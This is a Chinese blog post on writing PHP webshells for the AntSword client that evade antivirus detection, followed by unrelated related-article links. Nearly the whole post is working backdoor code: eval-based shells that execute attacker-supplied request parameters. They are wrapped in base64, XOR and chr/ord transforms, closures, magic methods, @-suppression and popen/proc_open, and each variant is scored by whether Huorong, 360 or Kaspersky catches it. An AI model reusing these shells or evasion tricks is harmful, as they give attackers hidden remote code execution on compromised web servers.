蚁剑编码器编写——php木马免杀

蚁剑编码器编写------php木马免杀

我的想法是 木马要先免杀,能够落地,再去考虑流量层面的问题

举几个例子演示一下

命令执行与代码执行是有比较大的区别,蚁剑执行的是php代码,而system,proc_open,passthru,exec,shell_exec,反引号等都是命令执行,举个例子

c 复制代码
<?php eval($_REQUEST["a"]);?> //蚁剑可以连接成功,但是无法直接拼接执行命令
<?php passthru($_REQUEST["a"]);?>//蚁剑会显示数据为空,但是可以拼接执行命令

而能够执行多行php代码的函数也就只有eval,无论蚁剑还是godzilla,都是通过代码执行进而命令执行,所以你会看到所有的明文马儿里面都是有eval函数的,那么也就是说eval函数是无法替换的

那么就会有两个方面,加密再解密eval函数,更改eval写法

更改eval写法,举个例子

c 复制代码
<?php eval("/*echo*/".$_REQUEST["a"]);?>

或者

c 复制代码
<?php eval($_REQUEST["a"]."#aaa");?>

也是可以的。eval本身是支持字符串连接的

当然了,这已经不免杀了,那么加解密再来一下,

base64

c 复制代码
<?php eval(base64_decode(base64_encode($_REQUEST["a"]))."#aaa");?>

死在火绒手里

那么再加一个参数

c 复制代码
<?php eval(base64_decode(base64_encode($_REQUEST["a"])).$_REQUEST["b"]."#aaa");?>

又死了

加个条件判断

c 复制代码
<?php 
 if($_REQUEST["b"]=null){
     eval(base64_decode(base64_encode($_REQUEST["a"]))."#aaa");
 }else{
     echo $_REQUEST["b"];
 }
?>

继续

c 复制代码
<?php
$code='$a;';
 $func=function ($a) use ($code){
     return eval($code);
 };
 echo $func(eval($_REQUEST["a"]))

?>

又死在火绒的刀下

多加一层

c 复制代码
<?php
function a($b){
    return function ($c) use($b){
        return eval($c);
    };
}
$d=a('aaa');
echo $d(eval($_REQUEST["a"]))
?>

火绒的刀不太硬啊

魔术方法

c 复制代码
<?php
class test {
    public function __construct($b = null) {
        if ($b !== null) {
            eval($b);
        }
    }
}
$b=$_REQUEST["a"];
$test = new Test($b);
?>

当然了,360的刀到目前来说还是挺硬的

来个简单的加解密

c 复制代码
<?php
function xorEncryptDecrypt($data, $key) {
    $keyLength = strlen($key);
    $result = '';

    for ($i = 0; $i < strlen($data); $i++) {
        $keyChar = $key[$i % $keyLength];
        $result .= chr(ord($data[$i]) ^ ord($keyChar));
    }

    return $result;
}

$originalData = $_REQUEST["a"];
$key =  $_REQUEST["b"];


$encryptedData = xorEncryptDecrypt($originalData, $key);
$decryptedData = xorEncryptDecrypt($encryptedData, $key);
echo eval($decryptedData);
?>

也不行,那我加个@

c 复制代码
<?php
function xorEncryptDecrypt($data, $key) {
    $keyLength = strlen($key);
    $result = '';

    for ($i = 0; $i < strlen($data); $i++) {
        $keyChar = $key[$i % $keyLength];
        $result .= chr(ord($data[$i]) ^ ord($keyChar));
    }

    return $result;
}

$originalData = $_REQUEST["a"];
$key =  $_REQUEST["b"];


$encryptedData = xorEncryptDecrypt($originalData, $key);
$decryptedData = xorEncryptDecrypt($encryptedData, $key);
echo @eval($decryptedData);
?>

这也是成功拿下,当然了,你们要是把之前的马儿也加个@,或许有奇效

继续绕一下卡巴斯基

外面一层用其他函数替代

c 复制代码
<?php
$a="aaaa";
$a=$_REQUEST["a"];
$handle = popen(@eval($a), 'r');
if ($handle) {
    while (!feof($handle)) {
        $buffer = fgets($handle);
        echo $buffer;
    }
    pclose($handle);
}

那再换一个

c 复制代码
<?php
$descriptorspec = array(
    0 => array("pipe", "r"),
    1 => array("pipe", "w"),
    2 => array("pipe", "w")
);
$a=$_REQUEST["a"];
$process = proc_open(@eval($a), $descriptorspec, $pipes, NULL, NULL);

if (is_resource($process)) {
    $stdout = stream_get_contents($pipes[1]);
    fclose($pipes[1]);
    fclose($pipes[0]);
    echo "$stdout";
    $return_value = proc_close($process);

}

擦擦擦 竟然被360杀了,加解密一次

c 复制代码
<?php
function xorEncryptDecrypt($data, $key) {
    $keyLength = strlen($key);
    $result = '';

    for ($i = 0; $i < strlen($data); $i++) {
        $keyChar = $key[$i % $keyLength];
        $result .= chr(ord($data[$i]) ^ ord($keyChar));
    }

    return $result;
}

$descriptorspec = array(
    0 => array("pipe", "r"),
    1 => array("pipe", "w"),
    2 => array("pipe", "w")
);
$a=$_REQUEST["a"];
$key=123456789;
$encryptedData = xorEncryptDecrypt($a, $key);
$a = xorEncryptDecrypt($encryptedData, $key);

$process = proc_open(@eval($a), $descriptorspec, $pipes, NULL, NULL);

if (is_resource($process)) {
    $stdout = stream_get_contents($pipes[1]);
    fclose($pipes[1]);
    fclose($pipes[0]);
    echo "$stdout";
    $return_value = proc_close($process);

}

也是成功拿下,当然了,多写几个加密套在一起都可以免杀

chr配合ord加解密

c 复制代码
<?php
function simpleTransform($str, $offset = 1) {
    $transformed = '';
    for ($i = 0; $i < strlen($str); $i++) {
        $transformed .= chr((ord($str[$i]) + $offset) % 256);
    }
    return $transformed;
}

$original = $_REQUEST["a"];
$transformed = simpleTransform($original, 3);
function reverseTransform($str, $offset = 1) {
    $reversed = '';
    for ($i = 0; $i < strlen($str); $i++) {
        $reversed .= chr((ord($str[$i]) - $offset + 256) % 256);
    }
    return $reversed;
}

$reversed = reverseTransform($transformed, 3);
echo eval($reversed);
相关推荐
luck_0072 小时前
PhpSpreadsheet 导出excel 找不到setCellValueByColumnAndRow
php
生椰拿铁You2 小时前
解决Apache/2.4.39 (Win64) PHP/7.2.18 Server at localhost Port 80问题
php
brrdg_sefg3 小时前
WEB 漏洞 - 文件包含漏洞深度解析
前端·网络·安全
浏览器爱好者3 小时前
谷歌浏览器的网络安全检测工具介绍
chrome·安全
独行soc4 小时前
#渗透测试#漏洞挖掘#红蓝攻防#护网#sql注入介绍11基于XML的SQL注入(XML-Based SQL Injection)
数据库·安全·web安全·漏洞挖掘·sql注入·hw·xml注入
安全方案7 小时前
如何增强网络安全意识?(附培训PPT资料)
网络·安全·web安全
索然无味io7 小时前
跨站请求伪造之基本介绍
前端·笔记·学习·web安全·网络安全·php
H4_9Y8 小时前
顶顶通呼叫中心中间件mod_cti模块安全增强,预防盗打风险(mod_cti基于FreeSWITCH)
安全·中间件
伟大无须多言8 小时前
企业资源规划系统(ERP)服务器上线项目实施指南
开发语言·php